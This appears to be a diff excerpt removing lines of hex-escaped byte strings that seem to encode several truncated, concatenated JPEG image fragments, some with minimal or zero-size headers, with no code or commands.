-"\xbc\xee\x2e\xd2\x09\xe6\x63\x6e\x10\x0f\x9c\xe5\xce\x09\x6f\xcf" -"\x35\x2c\x37\x93\x40\x90\xcb\x3c\xdb\xed\x18\x64\x4e\x47\x41\xe8" -"\xfe\x9f\x5a\xb3\xa4\xfc\xf0\x4b\x3f\xfc\xf6\x99\xdb\x3e\xd9\xc0" -"\xfe\x54\xdb\x70\x2d\x2f\xde\xd1\x80\xf2\x67\xcc\x91\x03\xeb\xfc" -"\x4b\xfd\x6a\xdc\xaf\x74\xcc\xd4\x6d\x66\xba\xff\x00\x48\xd0\xa6" -"\x48\xe5\x54\xec\x5d\xec\x3f\x84\x1a\x4d\xef\x23\x23\x45\xb4\xc4" -"\x46\x4b\x7a\xfd\x28\xc4\x56\xf1\xbb\x9c\x22\xfd\xe6\x62\x7f\x9d" -"\x63\x63\x7b\x86\xc0\x58\x4b\x21\x20\xa8\xe9\x9e\x07\xbd\x52\x69" -"\x24\xd4\xd8\xc7\x03\x34\x76\x83\x87\x95\x4e\x0c\x9e\xca\x7b\x0f" -"\x7a\x40\x24\xd5\x4e\x5b\x74\x76\x43\xa2\xf4\x32\xfd\x7d\x17\xf9" -"\xd6\x8a\xa8\x55\x0a\xa0\x00\x38\x00\x76\xaa\xf8\x7d\x48\xf8\xbd" -"\x3f\x31\xb0\xc5\x1c\x11\x2c\x50\xa0\x48\xd0\x61\x55\x47\x00\x53" -"\x6e\xe5\xf2\x6d\x25\x97\xfb\x88\x4f\xe9\x52\xd5\x2d\x60\x93\x63" -"\xe5\x0e\xb3\x3a\xc7\xf9\x9e\x7f\x4a\x51\xd6\x5a\x95\x2d\x22\xec" -"\x4b\xa7\x45\xe4\xe9\xd6\xf1\xf7\x58\xc6\x7e\xb8\xa4\xd4\x2d\xde" -"\x7b\x7c\xc3\x81\x3c\x47\xcc\x88\x9e\x81\x87\xf4\x3c\x8f\xc6\xac" -"\x81\x81\x81\x45\x1c\xce\xf7\x1f\x2a\xe5\xe5\x19\x3c\xd1\xdb\xc4" -"\xd2\xcc\xe1\x11\x7a\x93\x54\x92\x19\x75\x07\x13\x5d\x29\x4b\x70" -"\x73\x1c\x07\xf8\xbd\xdb\xfc\x2a\x26\x9a\xde\x5b\xaf\xb4\x4f\x29" -"\x91\x50\x66\x28\xf6\x90\x14\xff\x00\x53\x5a\x30\xcc\x97\x01\xcc" -"\x2c\x18\x26\x33\xce\x38\xa4\xaa\x47\x68\xbb\xb1\x38\xb7\xac\x96" 
-"\x84\x94\x50\x08\x20\x10\x72\x0d\x14\x8b\x0a\xa5\x7b\xfb\xcd\x42" -"\xca\x2e\xc1\x9a\x43\xf8\x0f\xf1\x35\x76\xa2\x36\xea\x6f\x05\xc9" -"\x27\x70\x42\x80\x76\xeb\x9a\xa8\xbb\x32\x64\xae\xac\x4b\x45\x14" -"\x54\x94\x00\xff\xd9\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00" -"\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03" -"\x11\x00\x3f\x00\xf4\x64\xff\x00\x8f\xe8\x8f\x19\xc3\x73\xde\xaf" -"\xd6\x6a\x99\x05\xd4\x47\x6a\x67\x07\xae\x7f\x9d\x3a\x69\x6f\xbc" -"\xd7\xf2\x53\x72\x71\xb4\xe0\x7a\x7d\x6a\x39\xac\x8b\x51\xbb\xdc" -"\xd0\xa2\xb3\x1e\x5d\x50\x11\x88\xd3\x96\xf4\xe8\x39\xff\x00\xeb" -"\x54\xf1\x0b\xa1\xa8\x39\x66\xcc\x04\x71\xed\xc0\xe9\xfa\xd0\xa7" -"\x7e\x83\x74\xed\xd5\x11\xdf\xda\xdb\xa4\xbf\x6c\x13\xfd\x92\x7e" -"\x01\x94\x71\xbc\x7a\x30\xef\x53\xdb\xdf\x5b\x5c\x04\x11\x4c\xac" -"\xce\xbb\x80\xcf\x24\x7d\x29\x6e\xed\x45\xc8\x43\xbd\xa3\x74\x39" -"\x56\x00\x1c\x71\x8e\xf5\x52\xcf\x44\xb6\xb3\xb8\x49\xa3\x66\x62" -"\xa3\xf8\xb1\xd7\x18\xcd\x68\xdb\x66\x49\x25\xb1\xa7\x51\x5c\x5b" -"\xc3\x73\x11\x8a\xe2\x24\x96\x33\xd5\x5c\x64\x54\xb4\x52\x1e\xe6" -"\x6a\xca\x18\xb0\x2a\x40\x1c\x86\x3d\x08\xfa\xd4\x83\x2b\xf7\x18" -"\xaf\x18\xe2\xb3\x9e\xd6\x5b\x1c\xb5\x9a\x09\x2d\xcf\xde\xb6\xf4" -"\xff\x00\x77\xfc\x2a\x7b\x69\x52\x78\x15\xac\x9d\x42\xab\x10\xc8" -"\xc3\xa1\xee\x0f\x70\x69\xb8\xf5\x42\x52\xe8\xc8\x25\x16\x93\xea" -"\x53\xfd\xb5\xd4\x11\xb4\x28\x67\xc6\x06\x3e\xb4\xcb\x79\x61\x89" -"\x67\x48\xef\x0c\x31\x89\x70\xa5\x7e\x61\xf7\x46\x69\x9a\x8e\x94" -"\x9a\x95\xcb\x09\xc8\xc0\xe5\x43\x45\xfd\x6a\xed\x85\x92\xda\x41" -"\xe5\x12\xae\xa0\xfc\xa0\x20\x00\x53\x9d\x9c\x2d\x7d\x45\x4e\xea" -"\x77\x6b\x41\xef\x22\x0d\xa7\xfb\x42\x40\x0f\xcc\x32\xbd\x45\x49" -"\x67\x70\x82\x46\xcd\xd3\xcc\x76\x93\xb4\xae\x3a\x7a\x52\xec\x51" -"\xd0\x01\x81\x81\xc7\x4a\x95\x64\xda\x72\x63\x43\xd8\x60\x60\xfb" 
-"\xd6\x0a\x2e\xf7\x3a\x1c\xd5\xad\x6f\xcb\xfc\x8b\x28\xc1\xd1\x58" -"\x74\x61\x91\x4e\xa8\x92\x78\xce\x07\xdd\x24\xe0\x03\x52\x02\x08" -"\xc8\xe4\x56\xa6\x26\x65\x9d\xc2\xdd\xda\xa4\xe8\x0a\xee\x1c\xab" -"\x75\x53\xdc\x1f\x71\x51\x5c\xd9\x6f\x94\xdc\x5a\xbf\x93\x73\x8c" -"\x16\x03\x87\x03\xb3\x0e\xf5\x1a\x7f\xa1\xea\x85\x0f\xfa\x9b\xa3" -"\xb9\x7d\x9f\xb8\xfc\x7a\xd5\xfa\x6f\xdd\x77\x42\x5e\xf2\xb3\x29" -"\xdb\x5e\x09\x5c\xdb\x5d\x47\xe4\xcf\x8e\x50\xf4\x61\xea\xa7\xb8" -"\xa9\xfc\xb7\x8a\x20\xb6\xf8\xe3\xa2\xb9\x38\xc7\xa6\x7b\x52\x5d" -"\x5a\xc5\x75\x1e\xc9\x57\x38\xe5\x58\x70\x54\xfa\x83\x55\x45\xcc" -"\xd6\x0c\x12\xfd\xb7\xc3\xd1\x6e\x3a\x63\xfd\xef\x4f\xaf\x4a\x2d" -"\x7d\xbe\xe0\xbf\x2f\xc5\xf7\x97\x7c\xd5\x12\x88\xc9\xc3\x11\x90" -"\x31\xd6\x9f\x47\x04\x67\xa8\xa8\x84\x6d\x14\x6d\xe4\xe5\x8e\x72" -"\x15\xda\xa4\xb2\x5a\x06\x54\x61\x18\xa7\x18\x18\xed\xf8\x53\x04" -"\xaa\x19\x51\xc8\x57\x61\x9d\xa4\xd3\xe9\x06\xe4\x17\xd6\xff\x00" -"\x6a\xb5\x68\xc1\xda\xe3\xe6\x46\xfe\xeb\x0e\x86\x92\xc6\xe3\xed" -"\x56\xab\x21\x1b\x5c\x7c\xae\xbf\xdd\x61\xd4\x55\x8a\xa6\x22\x92" -"\xdf\x53\xdf\x1a\x13\x0d\xc0\xf9\xf1\xfc\x2c\x3a\x1f\xc4\x71\x54" -"\xb5\x56\x25\xe8\xee\x5c\xa4\x65\x0c\xa5\x58\x02\x0f\x50\x69\x68" -"\x00\x96\x55\x1d\xce\x2a\x4a\x33\xcc\x13\x69\xe7\x75\x92\xf9\x96" -"\xfd\xed\xfb\xaf\xfb\xbf\xe1\x56\xed\xae\x62\xba\x8b\xcc\x85\xb7" -"\x0e\x84\x77\x07\xd0\x8e\xd5\x2d\xc3\x25\xb2\xab\x4f\x2a\x20\x66" -"\xc0\xcf\x53\xf4\xf7\xac\xc9\x1a\xcc\xdc\x2d\xcc\x37\x3e\x4c\xbc" -"\x6f\x2a\x87\x0e\x3d\x08\xc7\x3f\xd2\x9c\xa7\x1d\xa6\xec\xc9\x51" -"\x6b\xe1\x5a\x1a\x64\x03\xd4\x03\x8a\x88\x23\xc6\x1c\xa3\x19\x33" -"\xc8\x56\x3d\x3f\x1a\x8f\xed\xf6\xd8\xff\x00\x5c\x3a\x7f\x75\xba" -"\xfe\x55\x35\xbc\xb1\xdc\xb3\x2c\x12\xab\x15\x00\xe0\x82\x2a\x14" -"\xe2\xdd\x93\x45\xb8\xbd\xda\x00\xff\xd9\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00" 
-"\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03" -"\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf4\x3f\x22\x3d\x36\x68\xd9" -"\x6e\xe4\x8e\xdc\xe4\x18\xe4\x6d\xca\x38\xec\x4f\x22\xaf\xc5\x2c" -"\x73\x26\xf8\x9d\x5d\x7d\x54\xe6\xa9\x6a\xfa\x7b\xea\x11\x47\x1a" -"\xc8\x23\x0a\x72\x49\x19\x35\x66\xd6\xd8\x5b\x23\x8d\xe5\xd9\xdb" -"\x73\x31\xe3\x26\x9b\x6d\xee\x24\x92\xd8\x9e\xa2\xfb\x3c\x41\xa4" -"\x64\x40\x8f\x27\xde\x64\xe0\x9f\xc6\xa5\xa2\x90\xc6\x46\xa5\x13" -"\x6b\x3b\x39\xfe\xf3\x63\x3f\xa5\x3e\xa3\x95\x19\xc0\x09\x2b\x47" -"\xee\x00\xa5\x8d\x4a\xae\x19\xcb\x9c\xf5\x34\x00\xfa\x28\xa2\x80" -"\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80\x0a\x28\xa2\x80" -"\x2a\x89\xdc\x67\x20\x30\xe3\x1d\xa9\xd2\xcd\xbe\x17\x58\x9b\x64" -"\x84\x10\xbb\xbd\x6a\x1a\x29\x5c\x6d\x14\xc3\xdc\x43\x70\x24\x66" -"\x78\xe3\x2b\xb0\x3c\xc7\x78\x07\xa9\xe9\xeb\x81\xf9\x55\x88\x75" -"\x46\x6d\xa2\x4b\x67\xe4\xed\xca\xf3\x96\xc6\x4f\x15\x20\xca\xfd" -"\xd2\x47\x18\xe2\x91\xc0\x75\x60\xe8\x0e\x54\xa8\x20\xed\x3c\xf5" -"\x39\xad\x39\xd3\xdd\x19\xf2\x49\x6c\xcb\x11\x5e\x5b\x4a\x01\x8e" -"\x64\x6c\xae\xe0\x33\xce\x2a\x65\x60\xca\x19\x4e\x41\xe4\x56\x4c" -"\xd6\x62\x43\xb6\x29\x55\x10\x39\x2a\xa5\x30\x72\x7d\x0f\xe7\x4d" -"\x90\xde\x59\x2a\x98\xdc\xba\xb0\x01\xdd\x8e\xe0\x0e\x49\xe3\xf9" -"\x51\xca\x9e\xcc\x5c\xcd\x6e\x8d\x9a\x2b\x3a\x5b\xe9\xa1\xb0\x86" -"\x57\x8c\x79\x8e\x79\x1e\x83\xa9\x3f\x95\x5e\x8d\xfc\xc8\xd5\xc0" -"\x61\x91\x9c\x30\xc1\xa9\x69\xa2\xd4\x93\x28\xac\x80\x85\xde\x3c" -"\xb6\x6f\xe1\x62\x33\x4f\xa4\x92\x30\x58\xac\x8a\x0e\xd3\xc6\x7f" -"\x9d\x28\xe2\xa0\xb4\x14\x51\x45\x03\x0a\x06\x57\xee\x92\x31\xe9" -"\x45\x14\x08\x24\xc4\x8a\x04\xa8\xb2\x60\x71\x9e\x0d\x5a\x49\x91" -"\xdb\x6f\x43\xd8\x1e\xf5\x56\xab\xde\x9c\x22\x73\x8e\x69\xdc\x4d" -"\x58\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff" -"\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11" 
-"\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00" -"\x3f\x00\xf4\xeb\xaf\xe0\xe3\xd7\xbd\x41\x52\xde\x0c\x85\x1c\x67" -"\x9e\x4f\x5a\xca\x6b\x18\xd0\x05\x92\xe3\x1c\x63\xd3\x35\x13\x6d" -"\x6c\x8d\x21\x14\xf7\x66\x85\x15\x4a\x0b\x68\xa2\x9b\xcc\x17\x19" -"\xc8\x2a\x06\xea\x8a\x48\x20\x8a\x20\xef\x31\x21\x0e\x3e\x45\x24" -"\xe4\x91\xd8\x75\x3c\x54\xa9\x49\xec\x8b\x71\x8a\xdd\xfe\x05\xf9" -"\xa4\xf2\x93\x76\x01\xe7\x1c\x9c\x53\x90\x92\xb9\x65\xda\x7d\x33" -"\x9a\xc9\x8c\xdb\xb7\xee\x37\xcc\xab\x29\x50\x37\xc2\x54\x64\x74" -"\xeb\xf4\xad\x28\xe1\x31\x46\xa8\x24\x38\x5e\x3b\x53\xf7\x96\xe8" -"\x97\xc9\x6f\x75\xdc\xa7\xad\x67\x16\xd9\x2d\x8d\xad\xd7\xf0\xac" -"\x29\x6e\x9d\x26\x68\xd2\x30\xc4\x60\x00\x5b\x19\xcf\xe1\xd2\xba" -"\x6b\xed\x36\x6b\x98\x62\x68\xdf\xe7\x40\x46\xd9\x3b\xfe\x35\x9e" -"\xfa\x65\xd2\xac\x8f\xfb\xa2\x23\xfb\xd8\x6e\x9c\x66\xbc\xac\x5e" -"\x1a\xad\x4a\xce\x51\x8d\xd1\xd5\x42\xb4\x21\x4f\x95\xbb\x1b\xb7" -"\x87\x01\x71\x82\x79\xc0\xee\x6b\x31\xbc\xc9\xc1\x33\xd9\xe4\xaf" -"\xdd\xc9\xf7\xad\x5b\xaf\xe0\xe4\xf7\xed\x50\x57\xad\x28\xdc\xe4" -"\x84\xb9\x4c\xe3\x1e\x79\xfb\x00\xe3\xde\x92\xe5\x4c\x31\x33\xa5" -"\x27\x39\xfa\x1a\xb6\x24\x94\xb3\x0f\xb3\x90\x00\x38\x3b\xc7\x35" -"\x2d\x28\xe4\xe0\x52\x8c\x1a\x56\x4f\xf2\x14\xe7\xcc\xdb\x68\x6d" -"\xa3\xdd\xfd\x99\x84\xf0\x64\x97\x3b\x70\xc0\x61\x09\x38\xfc\x86" -"\x3e\xb5\xcb\xda\xec\x10\x88\xe3\xdc\x04\x64\xc6\x43\xfd\xe0\x47" -"\x18\x3e\xf5\xd8\xdb\x44\xf0\xc4\x56\x49\x5a\x42\x58\xb0\x24\x74" -"\x04\xe7\x1f\x87\x4a\x82\xf7\x4a\xb2\xbd\x1f\xbf\x88\x83\x9c\xee" -"\x8d\x8a\x12\x7d\xc8\x23\x35\x96\x27\x0d\xed\xe2\xa3\xcc\x14\x6b" -"\x7b\x37\x7b\x1c\xd5\x15\xb5\x36\x93\xa5\x25\xdd\xb2\x48\xb2\xf9" -"\xaf\x91\x1a\x89\x1b\x9d\xa3\x24\x90\x0e\x3f\x13\xea\x29\x9a\x86" -"\x8f\x65\x6b\x65\x79\x79\x12\x48\x25\x48\x5d\x86\x65\x62\x32\x01" -"\x3d\x33\x8a\xe0\xfe\xca\x97\xf3\x1d\x4f\x1d\x1e\xc6\x82\x6c\xf2" -"\xfd\xeb\x17\xfe\x67\x18\xbf\xeb\xc9\xff\x00\xf4\x31\x5c\xcb\x6a" 
-"\x3e\x22\x59\xb6\x2d\xfc\x4d\x18\x20\x19\x07\x97\xfc\xba\xd6\xfe" -"\x85\x01\x37\x82\xee\xf7\x55\x8a\xf2\xed\xa2\x31\xa4\x68\x02\xed" -"\x5c\xe4\xf4\xeb\xd2\xbe\x89\xd1\x74\x93\x6d\xa3\xc6\x55\x95\x56" -"\x92\x4f\x73\x7a\x88\x23\xb7\xbd\x1b\x98\x79\x82\x19\x78\xc8\x20" -"\x07\x5e\xfe\xf8\xa4\x22\x52\xf1\x88\xa2\xde\x0b\x80\xe7\x76\x36" -"\xaf\xaf\xbf\xd2\xaf\x74\xae\x75\xa6\xa7\x4b\xd7\x41\x68\xa2\xa8" -"\x6a\x4b\x35\xcc\x90\xd9\x44\x24\x58\xe5\x3b\xa6\x95\x78\xda\x83" -"\x1f\x2e\x7d\x58\xe0\x7d\x33\x4d\x2b\xb1\x37\x64\x4b\x15\x9e\xdd" -"\x46\x6b\xc9\x1f\x7b\xba\x88\xe3\x18\xc7\x96\x83\x92\x07\xd4\xf2" -"\x7f\x0f\x4a\x6e\xb3\xff\x00\x20\x4b\xef\xfa\xf7\x93\xff\x00\x41" -"\x35\x72\xa9\xeb\x3f\xf2\x04\xbe\xff\x00\xaf\x79\x3f\xf4\x13\x4e" -"\x2e\xf2\x44\xc9\x5a\x2c\xcd\xfe\xc6\xb6\xff\x00\x9e\xd7\x7f\xf8" -"\x10\xd5\x2d\xae\x99\x6d\x6d\x71\xe7\x47\xe6\xbc\xbb\x4a\x06\x92" -"\x42\xf8\x07\x19\xc6\x7e\x82\xad\xd2\xdb\xc7\x6f\x76\x12\x62\x37" -"\xf9\x52\x1d\x84\xe4\x61\x86\x54\x9f\x7e\xf4\xb9\xa4\xfa\x95\xcb" -"\x15\xb2\x27\xb6\x89\xe1\x46\x12\x4b\xe6\x12\xc4\xe7\x6e\x30\x3b" -"\x0f\xc2\xa6\xa2\x8a\x43\x21\xba\xb8\x8e\xd2\xd6\x4b\x89\x89\x11" -"\xc6\xbb\x8e\x39\x3f\x85\x16\x8f\x34\x96\xb1\xbd\xcc\x62\x39\x59" -"\x72\xc8\x0e\x76\xfb\x53\x1b\xec\xb7\xac\xf0\xb6\xd9\x4c\x12\x29" -"\x65\xfe\xeb\x0c\x11\x9f\xd0\xd5\x9a\x7d\x05\xbb\xb8\x55\x3d\x67" -"\xfe\x40\x97\xdf\xf5\xef\x27\xfe\x82\x6a\xe5\x53\xd6\x7f\xe4\x09" -"\x7d\xff\x00\x5e\xf2\x7f\xe8\x26\x9c\x7e\x24\x29\x7c\x2c\xff\xd9" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0" -"\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11" -"\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xe8" -"\xe8\xac\x38\x2d\x1c\xea\xa9\x13\xc0\xe2\xd6\x29\x65\x28\xbb\x48" -"\x41\xc2\x11\xc7\x4c\x64\xb6\x3d\xfa\x74\xa9\xf4\x14\x31\x2c\xf1" -"\x88\x9f\x60\x20\x89\x9e\x36\x46\x93\x8e\x77\x03\xd5\x87\x73\xd0" 
-"\xe6\xbe\x56\x54\x92\x8d\xd3\x3d\xb8\xd4\x6d\xda\xc6\xad\x6d\x78" -"\x69\x92\x3f\x0e\x44\x62\x67\x9a\x38\xc3\x6d\xc2\xf2\x70\x4f\x00" -"\x7d\x72\x2b\x16\xb6\xbc\x36\xe3\xfe\x11\xe4\x92\x08\x0a\x8f\x9c" -"\xac\x59\xee\x09\xe3\x9f\x5f\xeb\x5e\x8e\x55\xf6\xfe\x5f\xa9\xc7" -"\x8e\xfb\x3f\x3f\xd0\xb2\x8d\xbd\x15\xf0\x57\x70\x07\x0d\xd4\x7d" -"\x69\x69\x11\x8b\x46\xac\xca\x51\x88\x04\xa9\xea\x0f\xa5\x2d\x7a" -"\xe7\x12\x0a\x28\xa2\x81\x9c\xdd\x15\xa3\xa2\xe8\xf6\x57\x7a\x0d" -"\xb4\xb3\x2c\xa5\xa7\x8d\x5d\xf1\x33\xf5\xc7\x6e\x78\xa9\x7f\xb2" -"\x74\xa9\x6e\x8d\x83\x47\x3a\xbc\x48\x1d\x7f\x7c\xc3\x72\x9e\xe0" -"\x83\x93\x82\x39\xcf\x4e\x3d\x6b\xc8\x79\x4c\x93\x6b\x9b\xf0\x3b" -"\x16\x3d\x34\x9f\x2e\xe6\x49\x38\x19\x35\xb7\xe1\xd6\xb8\x3e\x1f" -"\x8e\x49\x13\x33\x30\x66\x0a\x46\xdc\xfa\x7d\x3b\x54\xbf\xd8\x5a" -"\x7f\xda\x56\xe0\xc6\xe6\x45\xe4\x7e\xf1\xb0\x3f\x0c\xe2\xaf\xb2" -"\xb2\xc2\x56\x00\xa1\x82\x9d\x99\xe9\x9e\xd9\xae\xcc\x26\x17\xea" -"\xf7\xbb\xbb\x76\x30\xaf\x5b\xda\xda\xda\x58\xa6\x85\x8a\x29\x75" -"\x0a\xc4\x0d\xc0\x1c\x80\x7b\xd2\xd5\x6b\x99\xe6\x89\x60\x8d\x16" -"\x36\xb8\x99\xb6\x73\x9d\xa0\x80\x4b\x1f\x5e\xc7\x8a\x8e\x3b\xff" -"\x00\x2e\xe9\xac\xee\xb6\xb5\xc0\xda\x54\x42\xa4\xee\x53\x9e\x71" -"\xdb\x18\x39\xed\x5d\xbc\xad\xea\x73\xf3\xa5\xa3\x2e\xd1\x45\x15" -"\x25\x91\x78\x6b\xfe\x45\xbd\x3f\xfe\xb8\x2f\xf2\xab\x77\x16\x89" -"\x3d\xcd\xbd\xc6\xe6\x49\x20\x62\x55\x97\xb8\x23\x05\x4f\xb1\xe3" -"\xf2\x15\x53\xc3\x5f\xf2\x2d\xe9\xff\x00\xf5\xc1\x7f\x95\x69\xd6" -"\xb3\x76\x9b\x30\x82\xbc\x10\x80\x82\x32\x0e\x47\xb5\x2d\x50\xb1" -"\xb7\x96\xce\xee\xe2\x15\x5c\xda\x39\xf3\x62\x39\xfb\x8c\x4f\xcc" -"\xbf\x4c\xf2\x3e\xa7\xd2\xaf\xd4\xb5\x62\xd3\xba\x33\xae\xec\x95" -"\xe2\x75\x9a\x66\x60\xf2\x6e\x8c\x9c\x06\x8c\xf6\xda\x7d\x8e\x71" -"\x59\x50\xc4\xd0\xb5\xf1\x8a\xf0\x40\x60\x23\x73\x48\x03\xb4\x87" -"\x68\x3b\x9c\x9e\x70\x7a\x00\x31\xd2\xba\x29\xa0\x8a\x74\x09\x34" -"\x6b\x22\x86\x0c\x03\x0c\xe0\x83\x90\x6b\x2e\xf2\xd6\x3b\xb9\x64" 
-"\x0b\x12\x2c\xf1\x30\x51\x34\xb0\xee\x20\x70\x72\xb9\xeb\xfc\xb3" -"\x55\x19\x74\x22\x51\xbe\xa8\x9a\xde\x43\x35\xb4\x52\xb2\x14\x32" -"\x22\xb1\x53\xdb\x23\x38\xa9\x2b\x1a\x19\x12\xd2\xe5\xee\x2d\x56" -"\xe2\x5b\x30\xac\x6e\x67\x76\xdd\xbd\x86\x3e\x61\x9e\x4e\x39\xc9" -"\x1c\x7a\x56\xcd\x4c\xe3\x66\x5c\x25\xcc\x88\xbc\x35\xff\x00\x22" -"\xde\x9f\xff\x00\x5c\x17\xf9\x56\x9d\x66\x78\x6b\xfe\x45\xbd\x3f" -"\xfe\xb8\x2f\xf2\xad\x3a\xaa\x9f\x13\x26\x9f\xc0\x88\xae\x44\xc6" -"\xda\x41\x6c\xca\xb3\x6d\x3b\x0b\x8c\x8c\xf6\xcd\x47\xa7\xdd\xad" -"\xed\x9a\x4e\x14\xa3\x1c\xab\xa1\xea\x8c\x0e\x19\x4f\xd0\xe6\xac" -"\xd5\x79\x66\xb7\xb3\x64\xdc\xa2\x3f\xb4\x4a\x17\x70\x5e\x0b\x91" -"\xc6\x7e\xb8\xc6\x7e\x95\x2b\x55\x61\xbd\x1d\xcb\x15\x0d\xda\xca" -"\xd0\x1f\x21\x51\xa4\x04\x60\x39\x20\x63\x3c\xf2\x3d\xb3\x53\x51" -"\x48\xa3\x07\x58\x89\xdd\xa2\x0d\x29\xf2\xda\x45\x8c\x46\xc3\xe4" -"\x0c\x4f\xde\x6f\xef\x74\xe0\x74\xcf\xad\x3e\xde\x79\x23\xd4\x1e" -"\xca\xe6\x71\x3b\xf9\x62\x55\x60\x9b\x48\x19\x20\x86\xc7\x1f\x43" -"\x57\x6e\xed\xa3\x02\x79\x67\x97\x74\x52\x00\x19\x24\x23\x6a\xf6" -"\xe3\x3e\xbc\x56\x37\xf6\x7c\xf0\xcd\xf6\x7b\x34\x0a\x8a\x43\x23" -"\x36\x76\x03\xfd\xe7\x3d\x64\x6f\x6e\x82\xb4\x8d\x9a\xb3\x32\x95" -"\xd4\xb9\x90\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00" -"\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03" -"\x11\x00\x3f\x00\xf4\x7a\x28\xa2\xa4\xb2\x2b\x6b\x88\xee\x91\xda" -"\x12\x58\x47\x23\x44\xd9\x18\xc3\x29\xc1\xfd\x45\x4d\x83\xe9\x5c" -"\xc5\xbe\x92\x04\x96\xd0\x1b\x36\x4b\x73\xa9\xdd\x49\x2a\x05\x21" -"\x59\x30\xfb\x37\x7f\xb2\x7e\x5f\x63\x4b\x0e\x9a\xf0\x42\xb3\x45" -"\x04\xa2\x78\xf5\x50\x23\x6e\x72\x90\x79\x98\xc0\xf4\x4d\xa4\xfb" -"\x77\xa0\x9b\x9d\x2d\x14\x51\x41\x41\x45\x14\x50\x01\x45\x14\x50" -"\x01\x45\x14\x50\x01\x45\x14\x50\x01\x45\x14\x50\x01\x45\x14\x50" 
-"\x01\x45\x14\x50\x01\x45\x14\x50\x01\x45\x14\x50\x03\x63\x91\x25" -"\x89\x64\x89\x83\xa3\x8c\xab\x0e\x84\x53\xaa\x0b\x29\xcc\xf0\xb6" -"\xf0\x37\xc6\xe6\x37\x2a\x72\x09\x1d\x48\xa9\xe9\xb5\x67\x61\x27" -"\x75\x70\xa2\x8a\x29\x0c\x28\xa2\x8a\x00\x28\xa2\x8a\x00\xff\xd9" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0" -"\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11" -"\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf4" -"\x7a\x28\xa5\x1d\x46\x7a\x54\x96\x18\x3e\x94\x62\xb9\x17\xb6\x1f" -"\x61\x85\x5e\xca\xed\xb5\x91\x73\x19\x9a\x65\x8d\xbe\x6f\xde\x0d" -"\xcc\x5c\x70\x63\x2a\x38\x1f\xa0\xc1\xa7\xc9\x6a\x31\xa8\xc0\x56" -"\x7f\x28\xca\xb3\x7d\xa5\xed\x64\x62\xcd\xe6\x13\xe5\xc8\xbf\xf2" -"\xd1\x47\xa8\xfe\x12\x07\x6a\x09\xb9\xd5\xe2\x92\xb9\xa4\x8e\x26" -"\x28\xda\xde\x99\x70\x63\x6b\x58\xc4\x10\xa4\x6f\x28\x84\xe0\xef" -"\x41\x8e\x43\xe7\x1c\x9e\x71\x8e\x78\x35\xb7\xa4\xa5\xcc\x7a\x4d" -"\xaa\x5f\x12\x6e\x56\x30\x24\xdc\x72\x73\xee\x7b\x9c\x63\x27\xd6" -"\x81\xdc\xb5\x52\x5b\x34\x9e\x73\xa1\x8c\x08\x82\x82\x1f\x77\x53" -"\xce\x46\x3f\x2f\xce\xa3\xa9\x2d\x7c\xdf\x3a\x4c\xec\xf2\x70\x36" -"\xe3\x3b\xb7\x73\x9c\xfb\x74\xa6\x84\xc8\xe8\xa2\x8a\x45\x05\x14" -"\x51\x40\x05\x14\x56\x4c\xb7\xf7\x66\x49\xa0\x11\x15\x92\x19\x43" -"\xb8\x51\xcb\xc3\x9e\xa9\x9f\xbc\x71\xd7\xeb\x8e\xb8\xaa\x8c\x5c" -"\xb6\x22\x52\x51\xdc\xd6\xa9\x6d\x56\x5f\x36\x46\x2e\xa6\x22\x00" -"\x54\xdb\xc8\x3c\xe4\xe7\xf2\xfc\xaa\x08\xa5\x8e\x78\x96\x58\x5c" -"\x3c\x6e\x32\xac\x3a\x11\x53\xda\xc6\xe2\x49\x24\x32\x31\x46\x00" -"\x2a\x10\x30\xb8\xce\x48\xfa\xe7\xf4\xa4\x86\xf5\x22\xa2\x8a\x29" -"\x14\x14\x51\x54\xae\xb5\x14\x8c\x94\x80\x86\x91\x5c\x29\x2c\x8d" -"\xe5\x93\x9f\xbb\xbf\x18\x0d\xdb\xeb\x4d\x26\xf6\x26\x52\x51\xd5" -"\x89\xa8\x5f\xc7\x6f\x04\x81\x25\x09\x28\x1b\x90\xb0\xf9\x5b\x1d" -"\x57\x77\x4c\xf0\x45\x49\x2a\x2d\xe1\xb7\x91\x54\x18\xb1\xe6\xac" 
